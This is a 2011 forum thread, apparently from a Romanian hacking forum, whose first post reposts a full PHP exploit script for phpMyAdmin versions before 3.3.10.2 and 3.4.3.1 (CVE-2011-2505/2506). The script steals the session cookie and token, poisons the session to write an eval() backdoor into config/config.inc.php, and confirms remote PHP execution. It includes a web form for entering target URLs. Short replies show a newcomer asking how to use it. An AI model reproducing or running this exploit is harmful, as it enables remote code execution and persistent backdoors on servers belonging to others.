xaren Posted July 9, 2011 Report Share Posted July 9, 2011 <?php /*# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit# Date: 2011-07-09# Author: Mango of ha.xxor.se# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1# CVE : CVE-2011-2505, CVE-2011-2506# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html*/echo php_sapi_name()!=='cli'?'<pre>':'';?> . , )\ . . ,/) , / ) , )\ )\( /)/( (__( /( / ) __ __ ________ __ __ / \ ( )| |) \ / | |\ /| | | | | | | | (__)( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | | | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] Remote Code Injection [] [][] [] [] [] [] [] [] http://ha.xxor.se [][] [] [] [] [][] [][] [] [] _ _ ___ __ ____ __ ___ ___ | |-| || _ |\ /\ /| _ || ) |_|-|_||_|_|/_._\/_._\|___||_|_\ ___ ___ ___ _ _ ___ ___ __ __ ( < | [_ / /| || || )(_)| |\ | / >__)|_[_ \__\|____||_|_\|_| |_| |_|Use responsibly.<?php echo php_sapi_name()!=='cli'?'</pre>':'';if(php_sapi_name()==='cli'){ if(!isset($argv[1])){ output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2"); killme(); } $pmaurl = $argv[1];}else{ $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';}$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';$cookie = null;$token = null;if(!function_exists('curl_init')){ output('[!] Fatal error. Need cURL!'); killme();}$ch = curl_init();$debug = 0;if(php_sapi_name()!=='cli'){?><form method=post>URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/><input name=submit type=submit value=?></form><pre><?phpif(!isset($_REQUEST['submit']))killme(true);}output("[i] Running...");// Start a session and get a tokencurl_setopt_array($ch, array( CURLOPT_URL => $pmaurl.'/setup/index.php', CURLOPT_HEADER => 1, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false));output("[*] Contacting server to retrive session cookie and token.");$result = curl_exec($ch);if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url."); killme();}if(!$result){ output("[!] cURL error:".curl_error($ch)); killme();}if(false !== strpos($result, 'Cannot load or save configuration')){ output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist."); killme();}// Extract cookiepreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);$cookie = $matches[1];output("[i] Cookie:".$cookie);// Extract tokenpreg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);$token = $matches[2];output("[i] Token:".$token);// Poison _SESSION variablecurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme();}//echo htmlspecialchars($result,ENT_QUOTES);// Save filecurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);output("[*] Contacting server to make it save the injected code to a file.");if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme();}//echo htmlspecialchars($result,ENT_QUOTES);curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');curl_setopt($ch, CURLOPT_POST, 0);output("[*] Contacting server to test if the injected code executes.");if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme();}if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!"); output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");}else{ output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");}curl_close($ch);function output($msg){ echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n"; flush();}function killme(){ output("[*] Exiting..."); echo php_sapi_name()!=='cli'?'<pre>':''; die();}echo php_sapi_name()!=='cli'?'<pre>':'';?>Nu l-am testat.Sursa : phpMyAdmin 3.x Swekey Remote Code Injection Exploit Quote Link to comment Share on other sites More sharing options...
nuard62 Posted July 22, 2011 Report Share Posted July 22, 2011 salut, eu sunt nou si as vrea sa stiu ce tre sa fac cu acel site:D?Mai precis Cu Injection exploit Quote Link to comment Share on other sites More sharing options...
icebird Posted July 22, 2011 Report Share Posted July 22, 2011 (edited) salut, eu sunt nou si as vrea sa stiu ce tre sa fac cu acel site:D?Mai precis Cu Injection exploitIti sugerez sa incepi cu ceva mai usor... Edited July 22, 2011 by icebird Quote Link to comment Share on other sites More sharing options...
